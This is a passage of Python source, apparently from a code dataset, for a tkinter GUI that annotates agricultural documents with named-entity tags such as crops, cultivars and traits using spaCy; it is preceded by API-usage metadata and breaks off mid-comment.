{"api_name": "Tkinter.Frame", "line_number": 1067, 
"usage_type": "attribute"}, {"api_name": "Tkinter.Frame.__init__", "line_number": 1071, "usage_type": "call"}, {"api_name": "Tkinter.Frame", "line_number": 1071, "usage_type": "attribute"}, {"api_name": "Tkinter.Label", "line_number": 1074, "usage_type": "call"}, {"api_name": "Tkinter.Label", "line_number": 1078, "usage_type": "call"}, {"api_name": "Tkinter.Button", "line_number": 1081, "usage_type": "call"}, {"api_name": "Tkinter.Button", "line_number": 1085, "usage_type": "call"}, {"api_name": "Tkinter.Scrollbar", "line_number": 1088, "usage_type": "call"}, {"api_name": "Tkinter.Listbox", "line_number": 1089, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 1101, "usage_type": "call"}]} +{"seq_id": "74043233444", "text": "#!/bin/env python3\nimport platform\nimport spacy.tokens\n\nfrom agParse import *\nfrom tkinterColorList import *\nfrom datetime import datetime\nfrom functools import partial\nfrom json2py import *\nimport os.path\nfrom py2json import *\nfrom pyxpdf import Document, Page, Config\nfrom pyxpdf.xpdf import TextControl\nimport random\nimport tkinter as tk\nfrom tkinter import filedialog as fd\nfrom tkinter.scrolledtext import ScrolledText\n\n# 1) WE NEED TO RESOLVE STANDARDIZING THINGS SUCH AS\n# \"ROUGH AWNS\" and \"AWNS ARE ROUGH\", WHITE ALEURONE AND ALEURONE IS WHITE. NOTE: Maybe compound traits\n# do not make sense because we need to be able to know\n# relationships. We should look at co-reference resolution.\n# See: https://medium.com/huggingface/state-of-the-art-neural-coreference-resolution-for-chatbots-3302365dcf30\n#\n# 2) WE NEED TO GROUP ANNOTATIONS SUCH AS TRAITS INTO CATEGORIES THAT\n# MAKE SENSE TO THE USER. RIGHT NOW WE HAVE \"early maturity\" AND \"winter\"\n# AS TRAITS WHILE ACCORDING TO THE SPECS WE SHOULD BE RETURNING\n# “Maturity” : “early maturity”, “Season”: “winter”\n#\n# 3) \"It is medium maturing and medium tall (averages about 41 inches in plant height) with fair straw strength.\"\n# In the sentence above, medium tall will be tagged as trait. There is additional useful information in brackets\n# that tells you exactly what medium tall means (above 41 inches). Is it possible to extract this additional\n# information about the definition of medium tall.\n#\n# 4) If we are able to get NER to be reasonably accurate, the next step is being able to link properties to a\n# particular crop variety. Identifying crop traits is good but what would even be better is to know what crop\n# variety these traits are associated with. EXAMPLE:\n#\n# Alexis is a two-row spring malting and feed barley. It was released by Western Plant Breeders. It was selected from\n# the cross BI1622a/Triumph. It is midseason in maturity and is mid-tall with fair straw strength. At the time of\n# evaluation it was resistant to stripe rust. 
It was evaluated as Entry 966 in the UC Regional Cereal Testing program\n# in 1997 for spring planting in the intermountain region of northern California.\n#\n# What would be very useful is knowing what \"it\" is referring to in the paragraph above.\n#\n# 5) Need to start thinking about an ontology\n\n\n# Create NER GUI class\nclass CropNerGUI:\n    \"\"\" A class used to represent NER tagging GUI window.\n\n\n    ...\n    Attributes\n    ----------\n    self.rootWin : tk.Tk()\n        tkinter class that represents the main window\n    self.rootWin.title : self.rootWin.title()\n        Title for the GUI\n    self.rootWin.geometry : self.rootWin.geometry()\n        Size for the main window\n    self.model_dir : str\n        Path to language model directory\n    self.tags : list\n        Agricultural data NER tags.\n    self.colors : list\n        Colors used to highlight tags in self.tags. Should have the same number of entries as self.tags. NER tag in\n        self.tags[i] will be highlighted using color self.colors[i]\n    self.tag_colors_buttonID : dict\n        Dictionary with a tag as key and [color, buttonID] as value\n    self.raw_file : _io.TextIOWrapper\n        PDF or text file selected by user using the GUI\n    self.annotation_file : _io.TextIOWrapper\n        Annotation file selected by user using the GUI\n    self.chunk : int\n        Current logical partition of the document being annotated. By default, this is the page number because it is\n        natural to annotate a document in page increments.\n    self.pdf_document : pyxpdf.Document\n        PDF to be annotated that was selected using the GUI\n    self.file_name : str\n        Name of the pdf/text file being annotated. e.g., BarCvDescLJ11.pdf\n    self.file_prefix : str\n        File path prefix (minus file type) e.g., for BarCvDescLJ11.pdf path prefix is Data/DavisLJ11/BarCvDescLJ11\n    self.file_mode : str\n        Specifies whether the program is working on a pdf or text file\n    self.scrolled_text_line_content_index : dict\n        Contains index positions of characters in a given line. Key = line number; the value tuple holds the indices of the first and last\n        characters respectively. {2: (114, 228)} = line 2 has characters from index 114 to index 228\n    self.nlp_agdata : class (spacy.lang)\n        spaCy language model. Defaults to en_core_web_lg if not specified\n    self.cust_ents_dict : dict\n        Contains NER tag annotations. key = chunk number, values = entities\n    self.page_number : int\n        Current page number\n    self.metadata_toggle : bool\n        Boolean determining whether the metadata panel should be visible or not\n    self.json_initialized : bool\n        Whether a json file has been initialized in the workspace or not\n\n    NOTE: Though the widgets are instance variables, we will not document them here. Most are self-evident. We have\n    added inline comments in the code itself.\n\n    Methods\n    -------\n    font_plus(self)\n        Increase font size for text in ScrolledText (text box).\n    font_minus(self)\n        Decrease font size for text in ScrolledText (text box).\n    add_ent(self)\n        Add a user defined named entity to the application.\n    remove_ent(self)\n        Remove a user defined named entity from the application.\n    get_ner_model_dir(self)\n        Select a folder containing spaCy nlp pipeline.\n    open_file(self, file_type: str)\n        Open a file (pdf/text) to be annotated or an annotation file (json) to be reviewed, 
selected using the GUI.\n    load_page(self)\n        Load contents of a PDF or text file into text box.\n    update_scrolled_text_line_content_index(self)\n        Populate the dictionary self.scrolled_text_line_content_index with position indices for the first and\n        last characters in each line in the text box.\n    highlight_ent(self, start_char: int, end_char: int, label: str)\n        Given the start index and end index of a named entity, highlight it in the text box.\n    pre_tag(self, selection: str)\n        Pre-tag selected content or all the text in text box with NER tags.\n    overlap(self, interval_one: list, interval_two: list) -> bool\n        Check to see if two intervals overlap.\n    get_selected_interval(self) -> tuple\n        Determines the index of the first and last characters (char_start, char_end) selected by the user.\n    get_ner(self, tag_label: str)\n        Tag a piece of text that has been selected as a named entity.\n    remove_tag(self)\n        Untag a piece of text that was classified as a named entity.\n    review_annotations(self)\n        Load a json file containing annotations and review it.\n    clear_message(self)\n        Clear warning message.\n    clear_data(self)\n        Clear data in text box and dictionary containing annotations.\n    remove_all_tags(self)\n        Remove all the NER tags on text loaded in the text box.\n    tag_ner_with_spacy(self, text: str) -> spacy.tokens.Doc\n        Use NLP pipeline to identify named entities in the text.\n    file_save(self)\n        Save current annotation.\n    next_page(self)\n        Load the next page.\n    go(self)\n        Start the GUI running.\n    quit(self)\n        Callback method attached to the quit button.\n    \"\"\"\n\n    def __init__(self):\n        \"\"\" Initialize CropNerGUI object\"\"\"\n\n        self.rootWin = tk.Tk()\n        self.rootWin.title(\"GEMS NER Annotation Tool\")\n        self.rootWin.geometry('1250x700')\n        self.model_dir = None\n        self.tags=[\"ALAS\", \"CROP\", \"CVAR\", \"JRNL\", \"PATH\", \"PED\", \"PLAN\", \"PPTD\", \"TRAT\"]\n        self.colors=[\"violet\", \"lawn green\", \"deep sky blue\", \"yellow\", \"red\", \"orange\",\"pink\", \"brown\",\n                     \"MediumPurple1\"]\n        self.tag_colors_buttonID = {}\n        self.raw_file = None\n        self.annotation_file = None\n        self.chunk = None\n        self.pdf_document = None\n        self.file_name = None\n        self.file_prefix = None\n        self.file_mode = None\n        self.scrolled_text_line_content_index = {}\n        self.nlp_agdata = None\n        self.cust_ents_dict = {}\n        self.page_number = 0\n        self.metadata_toggle = False\n        self.json_initialized = False\n\n        # ----------------------- Widgets for GUI start here.\n        # Default font size for text in ScrolledText. Should be a string format\n        # for a number e.g., '16'\n        self.font_size = \"16\"\n\n        # Top level frame for GUI\n        self.top_frame = tk.Frame(self.rootWin)\n        self.top_frame.pack(side=tk.TOP, fill=\"x\")\n\n        # Blank label with 3 empty spaces used for formatting. Ensures there is some\n        # space between the edge and first widget e.g., button\n        self.blank_label_one = tk.Label(self.top_frame, text=\"   \")\n        self.blank_label_one.pack(side=tk.LEFT)\n\n        # The loop below is used to create the buttons the user will click to tag words/phrases\n        #\n        # Just inside the for loop, populate a dictionary with a tag as key and [color, buttonID] as value. This will\n        # make it easy to retrieve the color for a tag when a user selects a word/phrase and clicks on a button to\n        # tag the word/phrase. When the user tags the word/phrase, it will be highlighted in the GUI.\n        # This dictionary helps us retrieve the color for that particular tag. 
The loop does the equivalent\n # of self.tag_colors[\"highlight\"] = [\"gray\", buttonID] in an iteration\n #\n # After populating the dictionary, we will create a button for the different NER tags.\n #\n # NOTE: partial is used to pass a function to a widget e.g., button where the input changes for different\n # buttons. Below, we want to call the function self.get_ner (which takes a single input) several\n # times but each time we pass it a different value depending on the button that was clicked. If the ALAS\n # button is clicked, we want to pass the text \"ALAS\" but if the \"CROP\" button was clicked we want to pass the\n # text CROP. So, partial(self.get_ner, \"ALAS\") is the same as self.get_ner(\"ALAS\")\n #\n for i in range(len(self.tags)):\n tag_value = self.tags[i]\n color_value = self.colors[i]\n\n # Create button\n btn = tk.Button(self.top_frame, highlightbackground=color_value,text=tag_value,\n command=partial(self.get_ner, tag_value))\n # Button colors already behaved differently between all 3 major platforms (highlightbackground\n # behaves... weirdly on MacOS, just has an outline for Linux, and doesn't work on Windows). Now\n # it still behaves differently on all of them, but fully highlights the button on Windows.\n if(platform.system() == \"Windows\"):\n btn.config(bg=color_value)\n btn.pack(side=tk.LEFT)\n self.tag_colors_buttonID[tag_value] = [color_value, btn]\n\n # Blank label with empty spaces used for formatting.\n self.space_label = tk.Label(self.top_frame, text=\" \", width=3)\n self.space_label.pack(side=tk.LEFT)\n\n # Button user will click to tag selected text\n self.pre_tag_selection_btn = tk.Button(self.top_frame, text=\"Pre-Tag Selection\",\n command=partial(self.pre_tag, \"selection\"))\n self.pre_tag_selection_btn.pack(side=tk.LEFT)\n\n # Button user will click to remove tags\n self.clear_tag_btn = tk.Button(self.top_frame, text=\"Remove-Tag(s)\", command=self.remove_tag)\n self.clear_tag_btn.pack(side=tk.LEFT)\n\n # Button user will click to tag all the text in the text box\n self.pre_tag_page_btn = tk.Button(self.top_frame, text=\"Pre-Tag Page(s)\", command=partial(self.pre_tag, \"page\"))\n self.pre_tag_page_btn.pack(side=tk.LEFT)\n\n # Remove all tags button\n self.clear_btn = tk.Button(self.top_frame, text=\"Remove All Tags\", width=15, command=self.remove_all_tags)\n self.clear_btn.pack(side = tk.LEFT)\n\n # Frame with buttons that will contain user defined NER tags. Button with NER tags added by users will\n # be added to this frame. 
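# --- Editor's sketch (standalone, hypothetical names, not part of this file) of why
# --- functools.partial is used above rather than a bare lambda: partial freezes the tag
# --- argument at button-creation time, avoiding the late-binding pitfall where every
# --- lambda defined in a loop ends up seeing the loop variable's final value.
from functools import partial

def get_ner(tag_label):
    print("tagging selection as", tag_label)

tags = ["ALAS", "CROP", "CVAR"]
bad_callbacks = [lambda: get_ner(tag) for tag in tags]    # all three close over the same tag
good_callbacks = [partial(get_ner, tag) for tag in tags]  # each one keeps its own tag

bad_callbacks[0]()   # prints: tagging selection as CVAR  (late binding)
good_callbacks[0]()  # prints: tagging selection as ALAS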
This is done in the function add_ent\n self.cust_ent_frame = tk.Frame(self.rootWin)\n self.cust_ent_frame.pack(side=tk.TOP, fill=\"x\")\n\n # Label displaying the current working json file\n self.working_file_label = tk.Label(self.rootWin, text=\"Working Annotation File: \"+str(self.annotation_file))\n self.working_file_label.pack(side=tk.TOP)\n\n # Blank label for formatting\n self.blank_label_two = tk.Label(self.cust_ent_frame, text=\" \")\n self.blank_label_two.pack(side=tk.LEFT)\n\n # Frame containing options for users to add their own NER tags\n self.edit_ent_frame = tk.Frame(self.rootWin)\n self.edit_ent_frame.pack(side=tk.TOP, fill=\"x\", padx=\"40\")\n\n # Label for text entry for a new NER tag defined by the user\n self.trait_label = tk.Label(self.edit_ent_frame, text=\"Enter Entity Label:\", width=20)\n self.trait_label.pack(side=tk.LEFT)\n\n # Text entry widget for user to type the name of a user defined NER tag they want to add\n self.trait_entry = tk.Entry(self.edit_ent_frame, width=10)\n self.trait_entry.pack(side=tk.LEFT)\n\n # Button to add new NER tag\n self.add_ent_btn = tk.Button(self.edit_ent_frame, text=\"Add Entity\", width=10, command=self.add_ent)\n self.add_ent_btn.pack(side=tk.LEFT)\n\n # Button to remove NER tag added by the user\n self.remove_ent_btn = tk.Button(self.edit_ent_frame, text=\"Remove Entity\", width=10, command=self.remove_ent)\n self.remove_ent_btn.pack(side=tk.LEFT)\n\n # Middle frame for text box and additional file elements like metadata entries\n self.middle_frame = tk.Frame(self.rootWin)\n self.middle_frame.pack(side=tk.TOP, fill=\"x\")\n\n # Text box. Note, height defines height in widget in lines based on font size. If the font size is bigger,\n # you end up with a bigger textbox because each line will occupy more space.\n self.text = ScrolledText(self.middle_frame, height=20, width=140, font=\"Times \"+self.font_size, wrap='word')\n self.text.focus_force()\n self.text.pack(side=tk.TOP)\n\n # Metadata button for setting metadata for current raw file\n self.metadata_btn = tk.Button(self.edit_ent_frame, text=\"Metadata\", width=10, command = self.toggle_metadata)\n self.metadata_btn.pack(side=tk.RIGHT)\n\n # Doc label\n self.doc_label = tk.Label(self.middle_frame, text=\"Document Name\")\n # Doc entry\n self.doc_entry = tk.Entry(self.middle_frame, width=30)\n # URL label\n self.url_label = tk.Label(self.middle_frame, text=\"URL\")\n # URL entry\n self.url_entry = tk.Entry(self.middle_frame, width=30)\n # Date label\n self.date_label = tk.Label(self.middle_frame, text=\"Date file created\")\n # Date entry\n self.date_entry = tk.Entry(self.middle_frame, justify=tk.CENTER, width=30)\n self.date_entry.insert(0, \"File not initialized\")\n self.date_entry.config(state=tk.DISABLED)\n\n # Specify how text will be highlighted in the textbox when a user selects it and click on a button to\n # tag the text. If we only had one button (ALAS), we would have done this using the command\n # self.text.tag_configure(\"ALAS\", background=\"violet\") but we need to do this for all the NER tag buttons\n # hence the for loop\n for tag, color_buttonID in self.tag_colors_buttonID.items():\n color = color_buttonID[0]\n self.text.tag_configure(tag, background=color)\n\n # Frame just below the text box. 
It contains buttons in the \"Exit\" button row\n self.bottom_frame = tk.Frame(self.rootWin)\n self.bottom_frame.pack(side=tk.TOP, fill=\"x\")\n # Blank label for formatting\n self.blank_label_three = tk.Label(self.bottom_frame, text=\" \")\n self.blank_label_three.pack(side=tk.LEFT)\n # Exit button\n self.exit_btn = tk.Button(self.bottom_frame, text=\"Exit\",width=10,command=self.quit)\n self.exit_btn.pack(side = tk.LEFT)\n # Load button\n self.load_btn = tk.Button(self.bottom_frame, text=\"Load Data\", width=10, command=self.load_page_from_button)\n self.load_btn.pack(side=tk.LEFT)\n # Clear data button\n self.clear_data_btn = tk.Button(self.bottom_frame, text=\"Clear Data\", width=10, command=self.clear_data)\n self.clear_data_btn.pack(side=tk.LEFT)\n # Clear message button\n self.msg_btn = tk.Button(self.bottom_frame, text=\"Clear Warning Message\", width=20, command=self.clear_message)\n self.msg_btn.pack(side=tk.LEFT)\n # Next page button\n self.next_btn = tk.Button(self.bottom_frame, text=\"Next Page\", command=self.next_page)\n self.next_btn.pack(side=tk.LEFT)\n # Save button\n self.save_btn = tk.Button(self.bottom_frame, text=\"Save\", width=10, command=self.file_save)\n self.save_btn.pack(side=tk.LEFT)\n\n # Frame that will contain messages being displayed to the user\n self.msg_frame = tk.Frame(self.rootWin)\n self.msg_frame.pack(side=tk.TOP)\n # Label to display messages\n self.msg = tk.Label(self.msg_frame, text=\"\", padx=5, pady=5)\n self.msg.pack(side=tk.LEFT)\n\n # Frame for selecting files and folders\n self.open_frame = tk.Frame(self.rootWin)\n self.open_frame.pack(side=tk.TOP,fill=\"x\")\n # Blank label for formatting\n self.blank_label_five = tk.Label(self.open_frame, text=\" \")\n self.blank_label_five.pack(side=tk.LEFT)\n # Select file to be annotated button\n self.open_button = tk.Button(self.open_frame,text='Select Raw Data File(PDF/txt)', width=18,\n command=partial(self.open_file, \"pdf/txt\"))\n self.open_button.pack(side=tk.LEFT)\n # Select folder with language model\n self.ner_model_button = tk.Button(self.open_frame, text='Select NER model folder', width=18,\n command=self.get_ner_model_dir)\n self.ner_model_button.pack(side=tk.LEFT)\n # Enter page you would like to load. Start with 1 as opposed to the conventional 0 numbering in CS\n self.page_label = tk.Label(self.open_frame, text=\"Raw Data File Page Num:\", width=18)\n self.page_label.pack(side=tk.LEFT)\n self.page_entry = tk.Entry(self.open_frame, width=5)\n self.page_entry.pack(side=tk.LEFT)\n self.page_entry.bind(\"<Return>\", self.load_page_from_button)\n # Select annotation file\n self.annotation_btn = tk.Button(self.open_frame, text=\"Select Annotation File(JSON)\",width=20,\n command=partial(self.open_file, \"json\"))\n self.annotation_btn.pack(side=tk.LEFT)\n # Button to increase font in the text box (Font +)\n self.font_plus = tk.Button(self.open_frame, text=\"Font +\", width=10, command=self.font_plus)\n self.font_plus.pack(side=tk.LEFT)\n # Button to decrease font in the text box (Font +)\n self.font_minus = tk.Button(self.open_frame, text=\"Font -\", width=10, command=self.font_minus)\n self.font_minus.pack(side=tk.LEFT)\n \n\n def font_plus(self):\n \"\"\"\n Increase font size for text in ScrolledText (text box), changing window size with it.\n\n Expects the global variable self.font_size which is of type string to be set. 
The default value is \"16\".\n This function increments self.font_size by 1 and then updates font size in self.text.\n \"\"\"\n prev_text_size = self.text.winfo_reqheight()\n self.font_size = str(int(self.font_size) + 1)\n self.text['font'] = \"Times \"+self.font_size\n new_size = (self.text.winfo_reqheight() - prev_text_size) + self.rootWin.winfo_reqheight()\n self.rootWin.geometry(str(self.rootWin.winfo_reqwidth()) + \"x\" + str(new_size))\n\n def font_minus(self):\n \"\"\"\n Decrease font size for text in ScrolledText (text box), changing window size with it.\n\n Expects the global variable self.font_size which is of type string to be set. The default value is \"16\".\n This function decreases self.font_size by 1 and then updates font size in self.text.\n \"\"\"\n prev_text_size = self.text.winfo_reqheight()\n if not (int(self.font_size) <= 1):\n self.font_size = str(int(self.font_size) - 1)\n else:\n self.msg.config(text=\"Font size can't get any smaller!\", foreground=\"red\")\n self.text['font'] = \"Times \"+self.font_size\n new_size = (self.text.winfo_reqheight() - prev_text_size) + self.rootWin.winfo_reqheight()\n self.rootWin.geometry(str(self.rootWin.winfo_reqwidth()) + \"x\" + str(new_size))\n\n def add_ent(self):\n \"\"\"\n Add a user defined named entity to the application.\n\n Expects the text entry for specifying a user defined entity tag to have the name of a user defined named\n entity. It then adds this new named entity to the application.\n \"\"\"\n ent_label = self.trait_entry.get().upper()\n if ent_label in self.tags:\n self.msg.config(text=\"Warning!! Cannot add entity. Another entity with the same label already exists!\",\n foreground=\"red\")\n else:\n # The code below select a color from color_list which is defined in tkinterColorList.py\n # If it loops through the length of the colors in color_list and does not find a color\n # that has not already been used, it generates a random color.\n color = None\n n = len(color_list)\n for i in range(n):\n # Randomly pick a color. This will hopefully get one that contrasts well with existing colors.\n i_color = color_list[random.randint(0, n)]\n # Check to see of the color selected has not been used\n if i_color not in self.colors:\n color = i_color\n break\n # Note, because we are selecting colors randomly from color_list, there is a chance we will not\n # find a color that has not already been used. This can happen if by chance we keep\n # selecting colors that have been used. If this happens, just create a random color.\n if color is None:\n color = \"#\" + (\"%06x\" % random.randint(0, 16777215))\n self.colors.append(color)\n self.tags.append(ent_label)\n btn = tk.Button(self.cust_ent_frame, highlightbackground=color, text=ent_label,\n command=partial(self.get_ner, ent_label))\n if(platform.system() == \"Windows\"):\n btn.config(bg=color)\n btn.pack(side=tk.LEFT)\n self.text.tag_configure(ent_label, background=color)\n self.tag_colors_buttonID[ent_label] = [color, btn]\n\n def remove_ent(self):\n \"\"\"\n Remove a user defined named entity from the application.\n\n Expects the text entry for specifying a user defined entity tag to have the name of a user defined named\n entity. 
It then removes this named entity from the application.\n \"\"\"\n ent_label = self.trait_entry.get().upper()\n try:\n color = self.tag_colors_buttonID[ent_label][0]\n ent_btn = self.tag_colors_buttonID[ent_label][1]\n ent_btn.pack_forget()\n # Remove elements from dictionary and arrays\n self.tag_colors_buttonID.pop(ent_label)\n self.colors.remove(color)\n self.tags.remove(ent_label)\n\n # Remove highlighting\n self.text.tag_remove(ent_label, \"1.0\", \"end\")\n\n # Remove from annotation dictionary. This can probably be simplified.\n new_ents = []\n input_text = self.cust_ents_dict[self.chunk][0]\n entities = self.cust_ents_dict[self.chunk][1]\n for ent in entities:\n if not (ent[2] == ent_label):\n new_ents.append(ent)\n new_ents.sort()\n self.cust_ents_dict[self.chunk] = [input_text, new_ents]\n\n # Clear warning message\n self.msg.config(text=\"\")\n except:\n self.msg.config(text=\"WARNING!! The entity you tried to remove does not exist.\", foreground=\"red\")\n\n def toggle_metadata(self):\n \"\"\"\n A button toggle to introduce/remove entry boxes for setting metadata for the json file.\n \"\"\"\n self.metadata_toggle = not self.metadata_toggle\n\n if self.metadata_toggle:\n self.text.pack(side=tk.LEFT, padx=(30,0))\n self.doc_label.pack(side=tk.TOP)\n self.doc_entry.pack(side=tk.TOP, pady=(0,10))\n self.url_label.pack(side=tk.TOP)\n self.url_entry.pack(side=tk.TOP, pady=(0,10))\n self.date_label.pack(side=tk.TOP)\n self.date_entry.pack(side=tk.TOP, pady=(0,10))\n else:\n self.text.pack(side=tk.TOP)\n self.doc_label.pack_forget()\n self.doc_entry.pack_forget()\n self.url_label.pack_forget()\n self.url_entry.pack_forget()\n self.date_label.pack_forget()\n self.date_entry.pack_forget()\n\n def get_ner_model_dir(self):\n \"\"\"\n Select a folder containing a spaCy nlp pipeline.\n\n Loads the nlp pipeline that will be used for tagging.\n\n Raises\n ------\n OSError\n If the selected folder does not contain a valid spaCy pipeline, an OSError will be thrown and\n a default language model is used instead.\n \"\"\"\n \n dir = fd.askdirectory()\n # Do nothing if the user presses cancel or X\n if dir == \"\":\n return\n\n self.model_dir = dir\n try:\n self.nlp_agdata = spacy.load(self.model_dir)\n lang = self.nlp_agdata.lang # Attribute error thrown if valid language model is not selected\n self.msg.config(text=\"NOTE: Model for \"+lang+\" language identified\", foreground=\"orange\")\n except OSError:\n self.msg.config(text=\"WARNING!!: Selected folder does not contain valid language model \\n\"\n \"Default model 'en_core_web_lg' will be used.\", foreground=\"red\")\n self.nlp_agdata = spacy.load(\"en_core_web_lg\")\n # Resize window to fit error (it'll push buttons below the bottom if you don't\n # do this and the window has been resized before)\n new_height = self.rootWin.winfo_reqheight() + 15\n self.rootWin.geometry(str(self.rootWin.winfo_reqwidth()) + \"x\" + str(new_height))\n # NOTE: Commenting the line below for now. We will try using spaCy noun phrases instead\n # to capture tags such as 'rough owns'\n # self.nlp_agdata.add_pipe(\"compound_trait_entities\", after='ner')\n\n\n\n \n def open_file(self, file_type: str):\n \"\"\"\n Open a file (pdf/text) to be annotated or an annotation file (json) to be reviewed, selected using the GUI.\n\n Parameters\n ----------\n file_type : str\n Type of file that was selected. This is either 'json' or 'pdf/txt'\n\n If a user selects a pdf or text file, it will be loaded into the text box for annotation. 
If a json file\n containing annotation is selected, it will be loaded with the annotations highlighted.\n \"\"\"\n # Clear warning message, if one exists\n self.msg.config(text=\"\")\n\n # file type\n if file_type == \"json\":\n filetypes = [(\"json files\", \"*.json\")]\n elif file_type == \"pdf/txt\":\n filetypes = [(\"data files\", \"*.pdf *.txt\")]\n\n # show the open file dialog\n f = fd.askopenfile(filetypes=filetypes)\n\n # do nothing if no file is chosen\n if f is None:\n self.msg.config(text=\"No file was chosen\", foreground=\"red\")\n return\n elif file_type == \"json\":\n self.next_btn.pack_forget()\n self.annotation_file = f\n self.file_prefix = self.annotation_file.name.split(\".\")[0]\n self.file_name = self.annotation_file.name.split(\"/\")[-1]\n self.working_file_label.config(text=\"Working Annotation File: \"+str(self.annotation_file.name.split(\"/\")[-1]))\n self.json_initialized = True\n self.raw_file=None\n self.review_annotations()\n elif file_type == \"pdf/txt\":\n\n self.raw_file=f\n\n # Ends the operation if a raw file wasn't selected\n if self.raw_file is None:\n self.msg.config(text=\"No raw data file has been selected. Please select a file to load.\", foreground=\"red\")\n return\n\n # Detects file type\n self.file_mode = self.raw_file.name.split(\".\")[-1] \n\n self.page_entry.delete(0, tk.END)\n\n if self.file_mode == \"pdf\":\n # Bring back the \"Next Page\" button, placing it before the save button.\n self.save_btn.pack_forget()\n self.next_btn.pack(side=tk.LEFT)\n self.save_btn.pack(side=tk.LEFT)\n self.page_entry.insert(0, \"1\")\n else:\n # Remove \"Next Page\" button if loading a txt file, which has no pages.\n self.next_btn.pack_forget()\n\n self.file_prefix = self.raw_file.name.split(\".\")[0]\n self.file_name = self.raw_file.name.split(\"/\")[-1]\n self.pdf_document = None\n self.annotation_file = None\n self.json_initialized = False\n\n # Reset metadata\n self.working_file_label.config(text=\"Working Annotation File: \"+str(self.annotation_file))\n self.doc_entry.delete(0, tk.END)\n self.doc_entry.insert(0, self.file_name)\n self.url_entry.delete(0, tk.END)\n self.date_entry.config(state=tk.NORMAL)\n self.date_entry.delete(0, tk.END)\n self.date_entry.insert(0, \"File not initialized\")\n self.date_entry.config(state=tk.DISABLED)\n\n self.load_page()\n else:\n self.msg.config(text=\"Warning!! 
Please select a valid file.\", foreground=\"red\")\n\n def page_num_is_valid(self, page_num):\n \"\"\"\n Returns True if page_num is a number, False if page_num is completely invalid, and -1 if it's a range.\n Note that the function expects spacing to have already been cleaned out of it prior to being called.\n In other words, it won't necessarily recognize something like \"1 - 5\" as a range.\n \"\"\"\n if page_num.isdigit():\n return True\n dash_index = page_num.find(\"-\")\n if(dash_index == -1):\n return False\n pg1 = page_num[0 : dash_index]\n if not pg1.isdigit():\n return False\n pg2 = page_num[dash_index + 1:]\n if not pg2.isdigit():\n return False\n return -1\n\n def handle_bad_page_requests(self, page_num_valid):\n \"\"\"\n If a page not in the doc is requested, this will set the page number to a valid\n one and print a warning.\n\n page_num_valid is passed in so that this method already knows whether it should\n be checking a list or single number.\n \"\"\"\n doc_length = len(self.pdf_document)\n err = False\n double_err_text = \" At least one other error was not displayed- see entry box.\"\n if page_num_valid == -1: # ie, page number is a range\n if self.page_number[0] < 1: # This will only take effect if the starting page is set to 0. Beginning hyphens are already invalid.\n self.page_number[0] = 1\n self.msg.config(text=\"First page entered is less than 1; setting first page to 1\", foreground=\"red\")\n self.page_entry.delete(0, tk.END)\n self.page_entry.insert(0, \"1-\" + str(self.page_number[1]))\n err = True\n if self.page_number[1] < 1:\n self.page_number[1] = 1\n self.page_entry.delete(0, tk.END)\n if(err): # This will only happen if the user enters some form of \"0-0\"- trying to do a negative anywhere doesn't count as a range, just invalid\n self.msg.config(text=\"PDFs start with page 1, not 0. Additionally, you can enter just one page instead of a range if you'd like. Going to page 1.\", foreground=\"red\")\n self.page_entry.insert(0, \"1\")\n else:\n self.msg.config(text=\"Second page entered is less than 1; setting second page to 1\", foreground=\"red\")\n self.page_entry.insert(0, str(self.page_number[0]) + \"-1\")\n err = True\n if self.page_number[1] > doc_length:\n self.page_number[1] = doc_length\n if(err):\n err_text = \"Last page entered is greater than the length of the PDF; setting last page to the end of the PDF.\" + double_err_text\n else:\n err_text = \"Last page entered is greater than the length of the PDF; setting last page to the end of the PDF.\"\n err = True\n self.msg.config(text=err_text, foreground=\"red\")\n self.page_entry.delete(0, tk.END)\n self.page_entry.insert(0, str(self.page_number[0]) + \"-\" + str(self.page_number[1]))\n if self.page_number[0] > doc_length:\n self.page_number[0] = doc_length\n err_text = \"First page entered is greater than the length of the PDF; setting first page to the end of the PDF.\"\n if(err):\n err_text = err_text + double_err_text\n self.msg.config(text=err_text, foreground=\"red\")\n self.page_entry.delete(0, tk.END)\n self.page_entry.insert(0, str(self.page_number[0]) + \"-\" + str(self.page_number[1]))\n else: # ie. there is a single page\n if self.page_number < 1: # This may as well be self.page_number == 0. 
A beginning hyphen is already invalid (not a digit or a range).\n self.page_number = 1\n self.msg.config(text=\"Page entered is too small; setting to 1\", foreground=\"red\")\n self.page_entry.delete(0, tk.END)\n self.page_entry.insert(0, \"1\")\n if self.page_number > doc_length:\n self.page_number = doc_length\n self.msg.config(text=\"Page entered is too large; setting it to the last page (\" + str(doc_length) + \")\", foreground=\"red\")\n self.page_entry.delete(0, tk.END)\n self.page_entry.insert(0, str(doc_length))\n\n def handle_page_range(self, page_range: list):\n \"\"\"\n Sets everything related to the page number with the assumption that\n the user has entered a range of numbers rather than a single page. I.e.,\n the range is ordered correctly, self.page_number is set to a list of\n two integer values, and self.chunk is set to the starting page.\n\n Spacing should be removed from page_range before it's passed into this method.\n \"\"\"\n dash_index = page_range.find(\"-\")\n pg1 = int(page_range[0 : dash_index])\n pg2 = int(page_range[dash_index + 1:])\n self.page_number = [pg1, pg2]\n # Switch first and last page if the user's first number was the larger one.\n if(self.page_number[1] < self.page_number[0]):\n self.msg.config(text=\"A larger page number was entered first. The pages will be displayed in order from smallest to largest anyway.\", foreground=\"red\")\n placeholder = self.page_number[0]\n self.page_number[0] = self.page_number[1]\n self.page_number[1] = placeholder\n self.page_entry.delete(0, tk.END)\n self.page_entry.insert(0, str(self.page_number[0]) + \"-\" + str(self.page_number[1]))\n self.chunk=self.page_number[0]\n\n def is_spaced_range(self, raw_page_entry: str):\n \"\"\"\n Checks to see if a page entry is simply two numbers separated by a space, which\n the program should handle as a range of pages.\n \n Lots of processing of page_entry is done both before and after this method is\n called. It will never be called on an entry with zany spacing, and it can be\n wrong when it comes to invalid inputs since they'll get filtered out anyway.\n \"\"\"\n first_space = raw_page_entry.find(\" \")\n # If there is one space...\n if(not(first_space == -1)) and (first_space == raw_page_entry.rfind(\" \")):\n # And if this space is surrounded by only two valid, positive digits...\n if(raw_page_entry[0 : first_space].isdigit() and raw_page_entry[first_space+1 :].isdigit()):\n return True\n return False\n\n def clean_spaces_in_page_entry(self, raw_page_entry: str):\n \"\"\"\n Removes extra spaces. Then it checks to see if a user entered a range separated with\n spaces and replaces the spaces with a dash if so.\n \"\"\"\n old_entry = raw_page_entry.strip() # Remove leading and trailing spaces so that something like \" 2 5\" gets loaded as \"2-5\" instead of \"25\"\n # Remove all spaces that are adjacent to a dash or a space\n # The below line is straight from 